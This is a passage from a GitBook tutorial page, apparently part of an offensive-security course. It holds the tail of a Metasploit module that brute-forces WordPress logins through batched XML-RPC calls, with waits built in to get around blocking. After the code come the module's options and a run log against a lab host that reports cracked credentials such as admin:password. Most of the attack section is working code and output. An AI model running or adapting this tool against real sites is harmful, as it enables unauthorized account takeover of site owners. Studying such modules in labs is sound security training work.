<span class="hljs-keyword">if</span> res && res.code != <span class="hljs-number">200</span>
|
1724
|
+
print_error(<span class="hljs-string">'It seems you got blocked!'</span>)
|
1725
|
+
print_warning(<span class="hljs-string">"I'll sleep for <span class="hljs-subst">#{datastore[<span class="hljs-string">'BLOCKEDWAIT'</span>]}</span> minutes, then I'll try again. CTR+C to exit"</span>)
|
1726
|
+
sleep datastore[<span class="hljs-string">'BLOCKEDWAIT'</span>] * <span class="hljs-number">60</span>
|
1727
|
+
<span class="hljs-keyword">end</span>
|
1728
|
+
<span class="hljs-variable">@res</span> = res
|
1729
|
+
<span class="hljs-keyword">end</span>
|
1730
|
+
|
1731
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span></span>
|
1732
|
+
<span class="hljs-keyword">return</span> <span class="hljs-keyword">if</span> check_wpstatus.<span class="hljs-keyword">nil</span>?
|
1733
|
+
|
1734
|
+
usernames.each <span class="hljs-keyword">do</span> |user|
|
1735
|
+
passfound = <span class="hljs-keyword">false</span>
|
1736
|
+
|
1737
|
+
print_status(<span class="hljs-string">"Brute forcing user: <span class="hljs-subst">#{user}</span>"</span>)
|
1738
|
+
generate_xml(user).each <span class="hljs-keyword">do</span> |xml|
|
1739
|
+
<span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> passfound == <span class="hljs-keyword">true</span>
|
1740
|
+
|
1741
|
+
send(xml)
|
1742
|
+
|
1743
|
+
<span class="hljs-comment"># Request Parser</span>
|
1744
|
+
req_xml = <span class="hljs-constant">Nokogiri::Slop</span> xml
|
1745
|
+
<span class="hljs-comment"># Response Parser</span>
|
1746
|
+
res_xml = <span class="hljs-constant">Nokogiri::Slop</span> <span class="hljs-variable">@res</span>.to_s.scan(<span class="hljs-regexp">/<.*>/</span>).join
|
1747
|
+
puts res_xml
|
1748
|
+
res_xml.search(<span class="hljs-string">"methodResponse/params/param/value/array/data/value"</span>).each_with_index <span class="hljs-keyword">do</span> |value, i|
|
1749
|
+
|
1750
|
+
result = value.at(<span class="hljs-string">"struct/member/value/int"</span>)
|
1751
|
+
<span class="hljs-comment"># If response error code doesn't not exist</span>
|
1752
|
+
<span class="hljs-keyword">if</span> result.<span class="hljs-keyword">nil</span>?
|
1753
|
+
user = req_xml.search(<span class="hljs-string">"data/value/array/data"</span>)[i].value[<span class="hljs-number">0</span>].text.strip
|
1754
|
+
pass = req_xml.search(<span class="hljs-string">"data/value/array/data"</span>)[i].value[<span class="hljs-number">1</span>].text.strip
|
1755
|
+
print_good(<span class="hljs-string">"Credentials Found! <span class="hljs-subst">#{user}</span>:<span class="hljs-subst">#{pass}</span>"</span>)
|
1756
|
+
|
1757
|
+
passfound = <span class="hljs-keyword">true</span>
|
1758
|
+
<span class="hljs-keyword">end</span>
|
1759
|
+
|
1760
|
+
<span class="hljs-keyword">end</span>
|
1761
|
+
|
1762
|
+
<span class="hljs-keyword">unless</span> user == usernames.last
|
1763
|
+
vprint_status(<span class="hljs-string">'Sleeping for 2 seconds..'</span>)
|
1764
|
+
sleep <span class="hljs-number">2</span>
|
1765
|
+
<span class="hljs-keyword">end</span>
|
1766
|
+
|
1767
|
+
<span class="hljs-keyword">end</span> <span class="hljs-keyword">end</span> <span class="hljs-keyword">end</span>
|
1768
|
+
<span class="hljs-keyword">end</span>
|
1769
|
+
</code></pre>
|
1770
|
+
<ul>
|
1771
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if the module has been written correctly (msftidy.rb)</li>
|
1772
|
+
</ul>
|
1773
|
+
<pre><code>metasploit-framework/tools/dev/msftidy.rb wordpress_xmlrpc_massive_bruteforce.rb
|
1774
|
+
</code></pre><p><strong>Run it</strong></p>
|
1775
|
+
<pre><code>msf auxiliary(wordpress_xmlrpc_massive_bruteforce) > show options
|
1776
|
+
|
1777
|
+
Module options (auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce):
|
1778
|
+
|
1779
|
+
Name Current Setting Required Description
|
1780
|
+
---- --------------- -------- -----------
|
1781
|
+
BLOCKEDWAIT 6 yes Time(minutes) to wait if got blocked
|
1782
|
+
CHUNKSIZE 1500 yes Number of passwords need to be sent per request. (1700 is the max)
|
1783
|
+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
1784
|
+
RHOST 172.17.0.3 yes The target address
|
1785
|
+
RPORT 80 yes The target port
|
1786
|
+
TARGETURI / yes The base path
|
1787
|
+
VHOST no HTTP server virtual host
|
1788
|
+
WPPASS_FILE /home/KING/Code/MSF/metasploit-framework/data/wordlists/http_default_pass.txt yes File containing passwords, one per line
|
1789
|
+
WPUSER_FILE /home/KING/Code/MSF/metasploit-framework/data/wordlists/http_default_users.txt yes File containing usernames, one per line
|
1790
|
+
|
1791
|
+
msf auxiliary(wordpress_xmlrpc_massive_bruteforce) > run
|
1792
|
+
|
1793
|
+
[*] Checking 172.17.0.3:80 status!
|
1794
|
+
[*] Target 172.17.0.3:80 is running WordPress
|
1795
|
+
[*] Brute forcing user: admin
|
1796
|
+
[+] Credentials Found! admin:password
|
1797
|
+
[*] Brute forcing user: manager
|
1798
|
+
[*] Brute forcing user: root
|
1799
|
+
[*] Brute forcing user: cisco
|
1800
|
+
[*] Brute forcing user: apc
|
1801
|
+
[*] Brute forcing user: pass
|
1802
|
+
[*] Brute forcing user: security
|
1803
|
+
[*] Brute forcing user: user
|
1804
|
+
[*] Brute forcing user: system
|
1805
|
+
[+] Credentials Found! system:root
|
1806
|
+
[*] Brute forcing user: sys
|
1807
|
+
[*] Brute forcing user: wampp
|
1808
|
+
[*] Brute forcing user: newuser
|
1809
|
+
[*] Brute forcing user: xampp-dav-unsecure
|
1810
|
+
[*] Auxiliary module execution completed
|
1811
|
+
</code></pre>
|
1812
|
+
|
1813
|
+
</section>
|
1814
|
+
|
1815
|
+
|
1816
|
+
</div>
|
1817
|
+
</div>
|
1818
|
+
</div>
|
1819
|
+
|
1820
|
+
|
1821
|
+
<a href="../module_0x5__exploitation_kung_fu/metasploit.html" class="navigation navigation-prev " aria-label="Previous page: Metasploit"><i class="fa fa-angle-left"></i></a>
|
1822
|
+
|
1823
|
+
|
1824
|
+
<a href="../module_0x5__exploitation_kung_fu/exploit_module.html" class="navigation navigation-next " aria-label="Next page: Exploit module"><i class="fa fa-angle-right"></i></a>
|
1825
|
+
|
1826
|
+
</div>
|
1827
|
+
</div>
|
1828
|
+
|
1829
|
+
|
1830
|
+
<script src="../gitbook/app.js"></script>
|
1831
|
+
|
1832
|
+
|
1833
|
+
<script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
|
1834
|
+
|
1835
|
+
|
1836
|
+
|
1837
|
+
<script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
|
1838
|
+
|
1839
|
+
|
1840
|
+
|
1841
|
+
<script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
|
1842
|
+
|
1843
|
+
|
1844
|
+
|
1845
|
+
<script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
|
1846
|
+
|
1847
|
+
|
1848
|
+
|
1849
|
+
<script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
|
1850
|
+
|
1851
|
+
|
1852
|
+
|
1853
|
+
<script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
|
1854
|
+
|
1855
|
+
|
1856
|
+
|
1857
|
+
<script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
|
1858
|
+
|
1859
|
+
|
1860
|
+
<script>
|
1861
|
+
require(["gitbook"], function(gitbook) {
|
1862
|
+
var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
|
1863
|
+
gitbook.start(config);
|
1864
|
+
});
|
1865
|
+
</script>
|
1866
|
+
|
1867
|
+
|
1868
|
+
</body>
|
1869
|
+
|
1870
|
+
</html>
|